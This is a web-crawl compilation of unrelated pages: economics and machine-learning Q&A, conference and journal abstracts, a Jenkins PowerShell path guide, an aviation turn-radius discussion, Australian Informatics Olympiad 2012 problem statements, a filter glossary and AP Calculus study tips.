• Why does average variable cost = marginal cost for this function? - I was hoping someone could explain the following. Suppose the short-run total cost function is TC = 50 + 12Q. Which of the following statements is true at all levels of production? The correct answer ...
• Labor Economy Question [closed] - Assume skilled TRNC citizens have relatively easy access to the job markets in the UK, EU, Australia and Canada, while the access of unskilled TRNC citizens to those markets is more limited and wages in ...
• Utility function $u(x)$ is monotonic. I want to prove that $u(x)$ exhibits risk aversion if and only if for all lotteries $F$: $E(x) \geq CE(F,u)$ (CE is certainty equivalent). (Definition of $CE$: the ...
https://nips.cc/Conferences/2020/ScheduleMultitrack?event=18974
Poster
Outlier Robust Mean Estimation with Subgaussian Rates via Stability
Ilias Diakonikolas · Daniel M. Kane · Ankit Pensia
Tue Dec 08 09:00 AM -- 11:00 AM (PST) @ Poster Session 1 #519
We study the problem of outlier robust high-dimensional mean estimation under a finite covariance assumption, and more broadly under finite low-degree moment assumptions. We consider a standard stability condition from the recent robust statistics literature and prove that, except with exponentially small failure probability, there exists a large fraction of the inliers satisfying this condition. As a corollary, it follows that a number of recently developed algorithms for robust mean estimation, including iterative filtering and non-convex gradient descent, give optimal error estimators with (near-)subgaussian rates. Previous analyses of these algorithms gave significantly suboptimal rates. As a corollary of our approach, we obtain the first computationally efficient algorithm for outlier robust mean estimation with subgaussian rates under a finite covariance assumption.
http://www.astroscu.unam.mx/massive_stars/submission/2006/06070713424.htm
## Supersonic turbulence in shock-bound interaction zones I: symmetric settings
Doris Folini (1), Rolf Walder (2,3)
1 - Institute of Astronomy, ETH Zurich, Switzerland
2 - Observatoire de Strasbourg, 67000 Strasbourg, France
3 - Max-Planck-Institut fur Astrophysik, 85741 Garching, Germany
Colliding hypersonic flows play a decisive role in many astrophysical objects. They contribute, for example, to molecular cloud structure, the X-ray emission of O-stars, the differentiation of galactic sheets, the appearance of wind-driven structures, or, possibly, the prompt emission of $\gamma$-ray bursts. Our intention is the thorough investigation of the turbulent interaction zone of such flows, the cold dense layer (CDL). In this paper, we focus on the idealized model of a 2D plane-parallel isothermal slab and on symmetric settings, where both flows have equal parameters. We performed a set of high-resolution simulations with upwind Mach numbers $5 < M_{\mathrm{u}} < 90$.

We find that the CDL is irregularly shaped and has a patchy and filamentary interior. The size of these structures increases with $\ell_{\mathrm{cdl}}$, the extension of the CDL. On average, but not at each moment, the solution is approximately self-similar and depends only on $M_{\mathrm{u}}$. We give the corresponding analytical expressions, with numerical constants derived from the simulation results. In particular, we find the root mean square Mach number to scale as $M_{\mathrm{rms}} \approx 0.2 M_{\mathrm{u}}$. Independent of $M_{\mathrm{u}}$ is the mean density, $\rho_{\mathrm{m}} \approx 30 \rho_{\mathrm{u}}$. The fraction $f_{\mathrm{eff}}$ of the upwind kinetic energy that survives shock passage scales as $f_{\mathrm{eff}} = 1 - M_{\mathrm{rms}}^{-0.6}$. This dependence persists if the upwind flow parameters differ from one side of the CDL to the other, indicating that the turbulence within the CDL and its driving are mutually coupled. Pointing in the same direction is the finding that the auto-correlation length of the confining shocks and the characteristic length scale of the turbulence within the CDL are proportional.

In summary, larger upstream Mach numbers lead to a faster expanding CDL with more strongly inclined confining interfaces relative to the upstream flows, more efficient driving, and finer interior structure relative to the extension of the CDL.
Reference: Astronomy and Astrophysics
Status: Manuscript has been accepted
https://ai.stackexchange.com/questions/15479/get-the-position-of-an-object-out-of-an-image
# Get the position of an object, out of an image
I have some images with a fixed background and a single object on them which is placed, in each image, at a different position on that background. I want to find a way to extract, in an unsupervised way, the positions of that object. For example, we, as humans, would record the x and y location of the object. Of course the NN doesn't have a notion of x and y, but I would like, given an image, the NN to produce 2 numbers that preserve as much as possible of the actual relative position of objects on the background. For example, if 3 objects are equally spaced on a straight line (in 3 of the images), I would like the 2 numbers produced by the NN for each of the 3 images to preserve this ordering, even if they won't form a straight line. They can form a weird curve, but as long as the order is correct it can be topologically transformed to the right, straight line. Can someone suggest any paper/architecture that did something similar? Thank you!
• By fixed, you mean the background is always the same image ? Sep 17, 2019 at 4:35
• @Astariul yes! and the object that changes position is also the same in each image (same size, shape, orientation etc.). Sep 17, 2019 at 5:45
• @Silviu-MarianUdrescu you mightn't need machine learning for this; it sounds like the object is very well defined. If you can code something up that works 100% of the time, why not do that? Sep 17, 2019 at 6:09
• @Recessive Ideally I want a NN that is able to learn the 2 numbers representation of an image, for any set of background and object moving. Coding it by hand works for only a fix background and a fix image (which is indeed what my post is about), but I want a NN approach so I can later generalize i.e. if I pass a new set of images (all with the same background and object, but different from the ones in the previous set of images) the NN would identify the "x" and "y" just as easily without any coding modifications. Coding something up manually would require a new code for each set of images. Sep 17, 2019 at 6:15
• @Silviu-MarianUdrescu There should be a few ways of doing this. You could create a regression CNN that outputs (x,y) coordinates (I wouldn't recommend this; it's very hard to get this to work, from my experience). You could use deconvolutional layers to produce an output image of similar dimensions to the input image, using a softmax on the entire image to produce a probability of the object being at each location (you could also produce a downscaled version if approximate location is OK). Other than that, I think there are some great resources online for object detection; just google search. Sep 17, 2019 at 6:29
## 1 Answer
As said in the comments, I wouldn't use Machine Learning for that.
You can achieve that result using something like OpenCV.
For example:
1. Get the "Naked" Background image: If you don't have it, you can easily calculate it by making an average of each image: background = np.mean(images, axis=0)
2. For each image, calculate the pixel difference between image and background. diffs = [img - background for img in images]
3. Diff's pixels can be negative, so take the absolute value of each pixel before converting it to grayscale.
4. If all goes well, you now have a dark noised image, with a bright silhouette of your object.
5. Set a threshold (e.g. threshold = np.percentile(diff, 95)) and make a binary mask, so now each pixel indicates 1 for the object silhouette and 0 for background.
6. Find the centroid of the object (like calculating the average coordinates for each pixel=1). And there you have it!
Of course, I just described one clear and easy way to do it; a consolidated sketch follows the checklist below. But you can find your own best solution.
• ✅ Don't need to train a neural network
• ✅ Don't need to label data
• ✅ Works for any set of image / background
• ✅ Precise coordinates
• ✅ Easy to make, debug and adapt.
• ✅ Runs fast
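Putting the six steps together, a compact numpy sketch (assumes images is a list of equal-size grayscale arrays, each containing the object exactly once):

```python
import numpy as np

def object_centroids(images, percentile=95):
    """Estimate the (row, col) position of a single moving object in each
    image, given a fixed background shared by all images."""
    background = np.mean(images, axis=0)               # step 1: average background
    centroids = []
    for img in images:
        diff = np.abs(img - background)                # steps 2-3: absolute difference
        mask = diff > np.percentile(diff, percentile)  # step 5: binary silhouette
        ys, xs = np.nonzero(mask)                      # step 6: centroid of mask pixels
        centroids.append((ys.mean(), xs.mean()))
    return centroids
```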
https://support.cloudbees.com/hc/en-us/articles/360010917872-How-to-configure-the-Powershell-path-environment-variable-on-a-Windows-agent-when-using-declarative-pipeline
# Issue
• When running a Windows agent connected to a CloudBees Jenkins controller, you may want to set the Powershell path environment variable in order to execute specific commands on the agent.
# Resolution
When setting the Powershell path from a declarative pipeline, one option is to call a batch file from the pipeline. Here is an example stage which calls a batch file:
```
stage('Run Tests') {
    steps {
        bat 'powershell -noexit "& "".\\run-tests.ps1"""'
    }
}
```
The Powershell path can then be set from within the Powershell script. An example of the contents of the run-tests.ps1 file is below:
```
$env:path = "$env:path;C:\selenium\geckodriver-v0.21.0-win64;C:\Program Files\nodejs"
npm install
node run-selenium-tests.js
```
In the above example, $env:path is appended with the folder containing the selenium geckodriver as well as the path to a nodejs installation.
https://aviation.stackexchange.com/questions/67842/how-can-i-get-lead-point-for-aircraft-to-intercept-final-course
# How can I get 'lead point' for aircraft to intercept final course?
As a controller, I always wonder when I should instruct an aircraft to turn. The aircraft does not turn at a right angle as soon as instructed, but rather has a turning radius. So, I tried to find the formula but failed.
If the speed of the aircraft is 300 kts and it is instructed to make a 90 degree turn, how much distance does the aircraft need for the turn? I made an image, and I wonder what the formula for 'x' is.
• Is that 300 kts airspeed or groundspeed? At what altitude does the aircraft make the turn? – DeltaLima Aug 19 '19 at 7:19
• I didn't consider those things as factors. For example, the altitude is 5,000 ft and the speed is ground speed. And I also want to know the formula for a 30 degree or other arbitrary angle. Thanks. – Min Aug 19 '19 at 12:04
Standard turn rate is 360° in 2 minutes so a 90° turn will take half a minute (30 s). The distance covered will be $$s = \frac {v}{60 \times 2} = \frac {v}{120}$$ (nautical miles).
The number you are looking for is the radius of the arc. This is given by $$s \times \frac {2}{\pi}$$ (nautical miles).
So the radius is given by $$r = \frac {v}{120}\times \frac {2}{\pi} = 0.0053 v$$. This is approximately $$\frac {v}{200}$$.
So for 300 kt the start turning would be $$\frac {300}{200} = 1.5$$ nautical miles from rollout.
I'm an engineer, not a pilot or controller, so wait for confirmation of my maths by someone who knows what they're talking about.
• I think your math is correct, but an aircraft traveling that fast under IFR will generally make half standard rate turns to avoid excessive angles of bank. The rule of thumb we used for a half standard radius was 1.0% of airspeed. So, 3nm at 300kias, 2.5nm at 250kias, etc. Avoids algebra while flying! ;) – Michael Hall Aug 18 '19 at 16:16
• That makes sense. You can post it as an answer. Thank you. – Transistor Aug 18 '19 at 16:30
• Thanks for answer. If the degree is 30, Could I get the lead point too? – Min Aug 19 '19 at 12:07
• @Transistor, I don't have time to verify against your formulas, but feel free to incorporate into your answer to make it more complete. – Michael Hall Aug 19 '19 at 17:29
• @Min, I will assume you are asking degrees of turn and not angle of bank. I am not sure if the math above supports this, but personally I would just divide by 3. For example, if I was doing 300 knots and using my rule of thumb of 3nm for a 90 degree turn, I would lead a 30 degree turn by about a mile. I would also recommend you confer with fellow controllers for advice on this matter. – Michael Hall Aug 19 '19 at 17:39
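For an arbitrary intercept angle (the 30-degree case asked about in the comments), the usual turn-anticipation geometry gives lead distance = r · tan(θ/2), where r is the turn radius. A quick Python sketch (assumes a constant-rate turn; pass 1.5 deg/s for the half-standard-rate turns mentioned above):

```python
import math

def lead_distance_nm(groundspeed_kt, turn_deg, rate_deg_per_s=3.0):
    """Turn-anticipation ("lead") distance in nautical miles, assuming a
    constant-rate turn: r = v / omega, lead = r * tan(theta / 2)."""
    v_nm_per_s = groundspeed_kt / 3600.0
    omega_rad_per_s = math.radians(rate_deg_per_s)
    radius_nm = v_nm_per_s / omega_rad_per_s
    return radius_nm * math.tan(math.radians(turn_deg) / 2.0)

print(lead_distance_nm(300, 90))  # ~1.59 nm, matching the answer above
print(lead_distance_nm(300, 30))  # ~0.43 nm for a 30-degree course change
```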
http://medalplus.com/?p=1914
# AIO2012 Solution (Chinese)
## NORT
It is the year 1982. Malcolm Fraser is the Prime Minister of Australia, you frequently listen to Down Under by Men at Work on your boombox and roller blading is the default mode of transport. As a budding computer scientist, you spend most weekends at the local arcade trying to top your score in the popular video game NORT.
NORT is played on a rectangular grid of square cells with H columns and W rows. You ride a light-bike through the grid, starting in the top-left corner cell. Each second, you can move your light-bike up, down, left or right to any of the four adjacent grid cells (as long as you don't go off the grid!). As you move, your bike's exhaust pipe creates an impenetrable wall of light in the cell you were previously in. If you ever move into a cell containing a wall of light (i.e. a cell you have travelled through before), your bike will disintegrate into pixels in a dramatic 8-bit explosion. The only exception is if you return to the top-left corner cell where you started, in which case the wall of light will be connected and your score for the game will be the total length of wall you have created.
Your goal is therefore to plan the longest possible route through the grid starting and ending in the top-left cell without ever passing through a cell more than once.
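For tiny grids the answer can be found by brute force, which is also a useful way to test a smarter solution. A sketch of that check (my own, not the official solution; exponential time, so small grids only):

```python
def longest_nort_tour(rows, cols):
    """Brute-force the longest closed tour from the top-left cell that
    never revisits a cell. Exponential time: tiny grids only."""
    best = 0
    visited = [[False] * cols for _ in range(rows)]

    def dfs(r, c, moves):
        nonlocal best
        for dr, dc in ((1, 0), (-1, 0), (0, 1), (0, -1)):
            nr, nc = r + dr, c + dc
            if not (0 <= nr < rows and 0 <= nc < cols):
                continue
            if (nr, nc) == (0, 0):
                best = max(best, moves + 1)  # returning home closes the wall
            elif not visited[nr][nc]:
                visited[nr][nc] = True
                dfs(nr, nc, moves + 1)
                visited[nr][nc] = False

    visited[0][0] = True
    dfs(0, 0, 0)
    return best

print(longest_nort_tour(2, 3))  # 6 -- the tour can cover the whole 2x3 grid
```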
## Posters
You run a poster advertisement company. Your company is quite small: all it owns is a rectangular wall in the city. Advertisers pay to put up their poster on your wall at some time at some position along the wall. These posters may have different widths, but are all exactly the same height as the wall. When a poster is put up, it may cover some of the posters already on the wall.
You have a log of every single poster put on your wall: their distance from the left end, their width, and the time they were put up.
Since people always walk from the left to the right of your wall, and we all know advertisement posters are only effective when they are completely uncovered (e.g. a burger picture will only be mouthwatering if you see the whole burger), you would like to determine the leftmost fully visible poster.
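A straightforward way to attack this before optimizing: on the final wall, a poster is fully visible exactly when no poster put up later overlaps any part of it. A quadratic-time sketch of that observation (my own, not the official solution):

```python
def leftmost_fully_visible(posters):
    """posters: list of (left, width, time) tuples, in any order.
    A poster is fully visible iff no poster put up later overlaps
    any part of it. O(n^2), fine for small logs."""
    best = None
    for l, w, t in posters:
        covered = any(t2 > t and l2 < l + w and l < l2 + w2
                      for l2, w2, t2 in posters)
        if not covered and (best is None or l < best[0]):
            best = (l, w, t)
    return best

# the poster at x=0 (width 4) is partly covered by the later one at x=2
print(leftmost_fully_visible([(0, 4, 1), (2, 3, 2), (6, 2, 3)]))  # (2, 3, 2)
```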
## Cabinet Shuffle
The polls are looking grim for the government of Absurdistan. Leadership speculation and high-profile scandals dominate popular current affairs shows Tomorrow This Morning and An Antiquated Event. In order to radically change public perceptions, the leaders plan to remove a ministry position and blame all the problems of the day on the ousted minister. At the same time, the other cabinet positions will be shuffled so as to portray a fresh, new face of government.
Naturally, the ministers cannot agree between themselves who will be blamed and expelled, nor can they agree who will take which remaining ministry positions (including the position of Prime Minister). They decide to play a fair game of Musical Chairs to the tune of Party Rock Anthem in order to resolve these disputes.
There are K ministry positions available, each represented by a physical seat at a point around a circle. The K+1 ministers are also initially standing at points around the circle. Points on the circle are labelled clockwise from 1 to N, such that point 1 immediately follows point N. No two ministers will be initially standing at the same point, and no two chairs will be at the same point.
Each second, all the ministers who are still standing do the following (simultaneously):
• If the minister is standing at the same point as an empty chair, the minister will sit down in it.
• Otherwise, the minister will step one place clockwise around the circle to the next point. If the minister was previously at point i (with i < N), the minister will now be at point i+1. If the minister was previously at point N, the minister will now be at point 1.
Since there are K+1 ministers, eventually all K seats will be taken and the one minister remaining without a seat will be booted out and shamed by the media. Furthermore, the minister sitting in the first seat in the circle will have the place of Prime Minister. (The 'first' seat in the circle is defined as the first seat clockwise from point 1.)
Your task is to determine who will be Prime Minister and who will be expelled from cabinet after the reshuffle. Note that your program can score half of the available marks for correctly answering only one of these questions, and will score full marks for correctly answering both.
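For small inputs the statement can be simulated directly. A sketch of that simulation (my own, with my own input conventions: 1-based points, 0-based minister indices):

```python
def cabinet_shuffle(N, chairs, ministers):
    """Simulate the game. Points are 1..N clockwise; `chairs` are the
    points with seats, `ministers` the starting points. Returns the
    (0-based) indices of the Prime Minister and the expelled minister.
    Standing ministers never collide: they all step together, and a
    minister leaves the moving set only by sitting down."""
    empty = set(chairs)
    pos = list(ministers)
    seated = {}                        # chair point -> minister index
    standing = set(range(len(ministers)))
    while len(standing) > 1:
        for m in [m for m in standing if pos[m] in empty]:
            empty.discard(pos[m])      # sit down (all such sit simultaneously)
            seated[pos[m]] = m
            standing.discard(m)
        for m in standing:             # everyone else steps one point clockwise
            pos[m] = pos[m] % N + 1
    pm = seated[min(chairs)]           # first chair clockwise from point 1
    return pm, standing.pop()

print(cabinet_shuffle(5, chairs=[2, 4], ministers=[1, 3, 5]))  # (0, 2)
```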
## King Arthur II
It has been many years since King Arthur has held a meeting for the Knights of the Round Table. Despite his best efforts to arrange seating in order to minimise conflict between knights, the last meeting deteriorated into a chaos of insulting and duelling unfit for the honourable dining room of Camelot.
Arthur must bring his knights together again, for rumour has spread throughout the kingdom that the dragons are becoming restless. In order to avoid the disasters of the last meeting, Arthur has decided to hold two meetings instead of one, and ensure that no two knights who would likely duel each other are invited to the same meeting. Furthermore, since immediate anti-dragon action is required, Arthur would like to have as many knights as possible at the first meeting.
After making a long list of all the knights and all the pairs of knights who may duel if invited to the same meeting, Arthur has requested you as the Court Informatician to write a program determining the largest number of knights that can be invited to the first meeting such that no pair of knights likely to duel each other are invited to the same meeting. Merlin, in his infinite wisdom, has assured you that there is at least one way of dividing all the knights into two meetings without any chance of duelling at either meeting.
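Merlin's guarantee says the duel graph is bipartite, so each connected component splits into exactly two valid sides, and Arthur can independently send the larger side of each component to the first meeting. A sketch of that idea (my own, not the official solution):

```python
from collections import deque

def max_first_meeting(n, duel_pairs):
    """n knights (0..n-1); duel_pairs are the edges of a graph that
    Merlin guarantees is bipartite. Two-colour each connected component
    and send its larger colour class to the first meeting."""
    adj = [[] for _ in range(n)]
    for a, b in duel_pairs:
        adj[a].append(b)
        adj[b].append(a)
    colour = [-1] * n
    total = 0
    for s in range(n):
        if colour[s] != -1:
            continue
        colour[s] = 0
        count = [1, 0]                 # knights of each colour in this component
        q = deque([s])
        while q:
            u = q.popleft()
            for v in adj[u]:
                if colour[v] == -1:
                    colour[v] = colour[u] ^ 1
                    count[colour[v]] += 1
                    q.append(v)
        total += max(count)            # components are independent
    return total

print(max_first_meeting(4, [(0, 1), (1, 2)]))  # 3, e.g. knights 0, 2 and 3
```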
## Awesome Frog
The inaugural International Olympiad in Frogleaping is being held in Australia in 2013 and you are determined to win. While you want nothing to do with such slimy, jumpy creatures, you plan to enter a frog-like robot that you know will be faster than all the other organic entrants.
However, your frog has one minor, uncorrectable flaw: it is only able to jump one fixed distance. Specifically, it can only jump exactly K metres forward from its current location, even if this lands the frog in the water (where it will promptly short-circuit).
Since the initial lily pad positions may make it impossible for your frog to reach the last lily pad, you plan to create a distraction and move the lily pads so that they are spaced exactly K metres apart, enabling your frog to jump from the first to the last without falling in the water. Shifting a lily pad by one metre will take you one second, and the longer you spend stealthily moving lily pads, the more likely that the IOF judges will notice and disqualify you from the competition.
Given the initial distances between the lily pads in the course, you must write a program to compute the minimum time you will have to spend shifting lily pads such that all pairs of consecutive lily pads are exactly K metres apart. You can assume that the pond is sufficiently long so that the first lily pad can be moved any distance back, and the last lily pad can be moved any distance forward.
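One standard way to see this problem: if pad i must end at c + i·K for some common shift c, then with offsets e_i = p_i − i·K the cost is the sum of |e_i − c|, which a median of the offsets minimises. A sketch under that reading (my own, not the official solution):

```python
def min_shift_time(positions, K):
    """positions: current pad coordinates in increasing order (build them
    as prefix sums of the given gap distances). Final pad i must sit at
    c + i*K for some c, so with offsets e_i = p_i - i*K the cost is
    sum |e_i - c|, which any median of the offsets minimises."""
    offsets = sorted(p - i * K for i, p in enumerate(positions))
    c = offsets[len(offsets) // 2]
    return sum(abs(o - c) for o in offsets)

# pads at 0, 3, 9 (gaps of 3 and 6), K = 4: move the middle pad 1 m
# right and the last pad 1 m left, giving pads at 0, 4, 8
print(min_shift_time([0, 3, 9], 4))  # 2
```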
https://www.kistler.com/en/glossary/term/filter-electronics/
# Filter (electronics)
## What is meant by filters and how do they influence the measurement signal?
In general, the term filter is understood to mean the blocking or passing of certain frequency ranges; in this way, a filter acts in the frequency domain. The cut-off frequency of the filter determines which components of the signal are cut off and which are allowed to pass.
## What is an idealised filter?
An idealised filter cuts off the measurement signal at a certain cut-off frequency or allows the measurement signal to pass above a certain cut-off frequency, whereby a clear separation of the required frequency range is created. The cut-off frequency separates the passband from the stopband of the filter.
## What is meant by "real filter"?
A real filter always has a transition range from the passband to the stopband in the range of the cut-off frequency. In the transition range, the frequency components are already attenuated, but not completely suppressed. The attenuation already begins at frequencies in the passband and continuously increases during the transition to the stopband until the frequency components are completely eliminated.
## What is the effect of a low-pass filter?
With a low-pass filter with a cut-off frequency of, for example, 150 Hz, all frequency components above 150 Hz are cut off. The signal is thus only passed in the frequency range up to the set cut-off frequency.
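As a concrete illustration, a first-order low-pass can be written in a few lines. This sketch is my own (not a Kistler implementation detail): a one-pole IIR filter whose output follows slow signal content and attenuates content above the cut-off, with the gradual transition described above for real filters.

```python
import math

def first_order_lowpass(samples, fc_hz, fs_hz):
    """One-pole IIR low-pass: y[n] = y[n-1] + a * (x[n] - y[n-1]).
    A first-order section, so the roll-off above fc is 20 dB/decade."""
    dt = 1.0 / fs_hz
    rc = 1.0 / (2.0 * math.pi * fc_hz)
    a = dt / (rc + dt)
    out, y = [], 0.0
    for x in samples:
        y += a * (x - y)
        out.append(y)
    return out

# A 10 Hz tone passes a 150 Hz filter almost unchanged; a 1 kHz tone is attenuated.
fs = 10_000
t = [n / fs for n in range(2000)]
mixed = [math.sin(2 * math.pi * 10 * ti) + math.sin(2 * math.pi * 1000 * ti) for ti in t]
smoothed = first_order_lowpass(mixed, fc_hz=150, fs_hz=fs)
```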
## What is the effect of a high-pass filter?
The high-pass filter behaves in the opposite way to the low-pass filter. If the cut-off frequency is set at 150 Hz, all frequencies above 150 Hz are transmitted, while frequencies below 150 Hz are blocked.
## What is a band-pass filter?
With this type of filter, two cut-off frequencies must be defined because the band-pass filter is a combination of first a high-pass filter followed by a low-pass filter. As a result, a defined frequency band is considered. If the lower cut-off frequency is set at 150 Hz and the upper cut-off frequency at 300 Hz, the result is a frequency band between the two cut-off frequencies that passes.
## What is the effect of a bandstop filter?
Also often called a notch filter, the bandstop filter is a parallel combination of a low-pass filter (set to the lower cut-off frequency) and a high-pass filter (set to the upper cut-off frequency) whose outputs are summed. This makes it possible, for example, to filter out certain frequency ranges in which interfering frequencies are present. If the lower cut-off frequency is defined at 150 Hz and the upper cut-off frequency at 300 Hz, the frequencies in between are filtered out.
## What is meant by filter orders?
The order of a filter defines the steepness of the transition between passband and stopband: the higher the order of a filter, the steeper the transition range. An nth-order filter has a slope of n × 20 dB per frequency decade; a second-order filter, for example, rolls off at 40 dB per frequency decade.
Higher order filters are obtained by connecting several filters in series. For example, if two second-order low-pass filters are connected in series, a fourth-order low-pass filter is created.
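This series-connection rule is easy to verify numerically. The sketch below (my own illustration, assuming ideal, buffered first-order sections so their responses simply multiply) evaluates the gain one decade above a 150 Hz cut-off:

```python
import math

def lp_gain_db(f_hz, fc_hz, order=1):
    """Magnitude of `order` identical first-order low-pass sections in
    series: |H| = (1 / sqrt(1 + (f/fc)^2)) ** order, expressed in dB."""
    gain = (1.0 / math.sqrt(1.0 + (f_hz / fc_hz) ** 2)) ** order
    return 20.0 * math.log10(gain)

# one decade above a 150 Hz cut-off: about -20 dB per first-order section
for order in (1, 2, 4):
    print(order, round(lp_gain_db(1500, 150, order), 1))
# -> roughly -20.0, -40.1, -80.2 dB: the slope grows by 20 dB/decade per order
```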
http://138.68.237.97/ap-calculus-tips/
# The Ultimate List of AP Calculus Tips
Learn the language and vocabulary, because half of the battle is knowing what a question is asking and/or telling you! Give yourself the benefit of analyzing the information presented in a question, because then you can execute on the knowledge and skills that you have practiced!
In order for you to score a 4 or 5 on the AP Calculus exam (AB or BC), it is important for you to follow the tips outlined below. In 2015, only 38.4% of students who took the AP Calculus AB exam received a grade of 4 or 5, while 61.5% of students who took the AP Calculus BC exam received a 4 or 5. The AP Calculus BC exam covers all of the topics in the AP Calculus AB exam plus some additional ones as well. Take the time to review the following tips and you'll be well on your way to earning the highest possible score on your AP Calculus exam. Relax, read and absorb the tips as you go! Good luck!
We recommend you supplement your AP Calculus preparation with Albert’s online practice questions. If you prefer going old school, you can read about the best review books for AP Calculus here.
## How to Study for AP Calculus Exam Tips
1. Know the exam’s content: The AP Calculus exam will cover a number of specific concepts besides just differentiation (Derivatives) and integration (Integrals). See the following for a comprehensive list of topics and concepts covered in the exam:
List of Topics and Concepts on the AP Calculus Exam
#### – Integrals

- Interpretations
- Properties
- Applications
- Techniques
- Numerical approximations
- Definite integrals
- Indefinite integrals
- Areas under curves
- Euler's Method
- Integration by parts

#### – Derivatives

- Concept
- At a point
- As a function
- Applications
- Higher-order derivatives
- Techniques
- Max/min problems

#### – Asymptotes
As Calculus is a systematic assembly of concepts, take the time to familiarize yourself with the terminology, and, more importantly, understand the actual concepts. Calculus is a highly conceptualized subject matter and it is extremely important that you have a firm grasp on all of the major concepts. Once you have mastered the individual concepts you are ready for the next step (Tip 2).
2. Practice makes perfect: In order to score a 4 or 5 on your AP Calculus exam you will need to practice lots of problems. The more problems you do, the more adept you will be at deciphering the way in which each type of problem is presented. There are numerous textbooks on calculus that are suggested study guides for students. Get one or two of these textbooks and start doing the problems in each chapter. You may also use online study guides for the same purpose. One such valuable resource is available at the Albert.io website. Do yourself a big favor and search for additional online resources as time permits. There are plenty of them! If you have extra time, we highly recommend visiting College Board’s AP Calculus course homepage.
3. Assess the exam and gauge your time appropriately: The exam consists of a multiple-choice section and a Free-Response Question (FRQ) section, each split into two timed parts, so four segments in all. You will be allowed to use a calculator in two of the segments and not in the other two. For each FRQ (there are six in total) your time allotment should be about 15 minutes, so try your best to pace yourself on these questions. With 45 multiple-choice questions in a total of 105 minutes, you have just over two minutes per multiple-choice question. By skimming the exam before you start, you can quickly tackle the problems you feel most comfortable with, then return to the more difficult questions.
4. Pay attention to detail: Especially when working with the AP Calculus FRQs, it is important that you are detail-oriented in solving the more complex parts of an FRQ. In other words, make sure that you detail every step in the process. For example, if a question involves two or three equations that require differentiation or integration at some point, then show this work in detail. You should draw a box around any important interim equations that you will need for figuring out the final answer.
Also, make sure that your final answer to an FRQ is clearly identified as such. If you are having problems with a particular multiple-choice question, use the process of elimination. Try your best to narrow down your answer to one or two of the multiple-choice selections. For example, if you know that the answer needs to be in derivative form, then you can eliminate any and all options containing the integral form.
5. Review and double-check your final answers: We cannot emphasize this tip enough. As time permits, always perform a quick review of an answer. OK, if you are so totally confident of a particular answer then don’t waste the time on re-checking its correctness. Move onto the next question and so on. For problems that you are not able to answer during your first skim, place a check mark or circle them so that it will be easy for you to find them later on during the exam. This will certainly be time well spent.
6. Review important trigonometric derivatives: Make sure that you know the common trigonometric derivatives and inverse trig derivatives. You will most definitely need them for many of the problems on the AP Calculus exam. Here is a list of the trig derivatives you should know by memory:
| Trig Derivatives | Inverse Trig Derivatives |
| --- | --- |
| $\frac{d}{dx}\sin{x}=\cos{x}$ | $\frac{d}{dx}\arcsin{x}=\dfrac{1}{\sqrt{1-x^2}}$ |
| $\frac{d}{dx}\cos{x}=-\sin{x}$ | $\frac{d}{dx}\arccos{x}=\dfrac{-1}{\sqrt{1-x^2}}$ |
| $\frac{d}{dx}\tan{x}=\sec^2{x}$ | $\frac{d}{dx}\arctan{x}=\dfrac{1}{x^2+1}$ |
| $\frac{d}{dx}\cot{x}=-\csc^2{x}$ | $\frac{d}{dx}\text{arccot}\,{x}=\dfrac{-1}{x^2+1}$ |
| $\frac{d}{dx}\sec{x}=\sec{x}\cdot\tan{x}$ | $\frac{d}{dx}\text{arcsec}\,{x}=\dfrac{1}{\lvert x\rvert\sqrt{x^2-1}}$ |
| $\frac{d}{dx}\csc{x}=-\csc{x}\cdot\cot{x}$ | $\frac{d}{dx}\text{arccsc}\,{x}=\dfrac{-1}{\lvert x\rvert\sqrt{x^2-1}}$ |
7. Show all of your work: Make sure that when performing solutions to either the multiple-choice or FRQ problems that you show all your work. This is especially important for the FRQs as partial credit will apply. Multiple-choice questions do not have partial credit. They are correct or wrong, so there is no in-between.
8. Write down the equations: If you are using your calculator to solve an equation, be sure to write down the equation first. An answer without an equation may not get full credit even if it is correct. Also, if you use your calculator to find the value of a definite integral or derivative, write down the integral or derivative equation first.
9. Use your calculator only for the following: Graphing functions, computing numerical values for derivatives and definite integrals, and for solving complex equations. In particular, do not use your calculator to determine max/min points, concavity, inflection points, increasing/decreasing, domain, and range. (You can explore all these with your calculator, but your solution must stand alone in order to receive credit).
10. Know both the product and quotient rules for derivatives: These are some of the most frequently used rules in all of Calculus. You must know them well for the AP exam. We have always used the following to remember the product rule: The derivative of the product of two functions of the same variable is equal to the first function times the derivative of the second function plus the second function times the derivative of the first. Symbolically the product rule is:
$\dfrac{d}{dx}\left(g\left(x\right) h\left(x\right)\right)=g\left(x\right)\dfrac{d}{dx} h\left(x\right)+h\left(x\right)\dfrac{d}{dx}g\left(x\right)$
The quotient rule is more complex and can be memorized as follows:
If:
$f\left(x\right)=\dfrac{g\left(x\right)}{h\left(x\right)}$
…then:
$f'(x)=\dfrac{g'(x)h(x)-g\left(x\right)h'(x)}{{\left[h(x)\right]}^{2}}$
In words you can memorize the quotient rule as follows: The derivative of a quotient of two functions of the same variable is equal to the derivative of the top function times the bottom function MINUS the top function times the derivative of the bottom function ALL over the bottom function squared.
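Both rules are easy to sanity-check symbolically. A minimal sketch using the sympy library (my choice of tool, not something the exam requires), applied to an arbitrary pair of functions:

```python
import sympy as sp

x = sp.symbols('x')
g = sp.sin(x)
h = x**2 + 1

# product rule: d(g*h)/dx == g*h' + h*g'
lhs = sp.diff(g * h, x)
rhs = g * sp.diff(h, x) + h * sp.diff(g, x)
print(sp.simplify(lhs - rhs))   # 0

# quotient rule: d(g/h)/dx == (g'*h - g*h') / h**2
lhs = sp.diff(g / h, x)
rhs = (sp.diff(g, x) * h - g * sp.diff(h, x)) / h**2
print(sp.simplify(lhs - rhs))   # 0
```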
11. Indefinite Integrals: If you are ever asked to integrate a specific function always remember to add + C as part of the answer after the equal sign. Leaving it out will cost you points. For example, what is the integral of:
$Y=f\left(x\right)={x}^{ 3}+{x}^{2}$ ?
$\int{Ydx}=\dfrac{{x}^{4}}{4}+\dfrac{{x}^{ 3}}{3}+C$
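A related caution if you verify integrals with software: computer algebra systems typically print an antiderivative without the constant of integration, so remembering the + C is still on you. A quick illustration with sympy (assumed available):

```python
import sympy as sp

x = sp.symbols('x')
print(sp.integrate(x**3 + x**2, x))   # x**4/4 + x**3/3 -- no "+ C" printed
```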
## AP Calculus Multiple-Choice Review Tips
In this section we review some specific tips regarding the multiple-choice portions of the AP Calculus exam. Although some of these may also be extended to the FRQ portion, these tips are more tailored to the multiple-choice questions on the test.
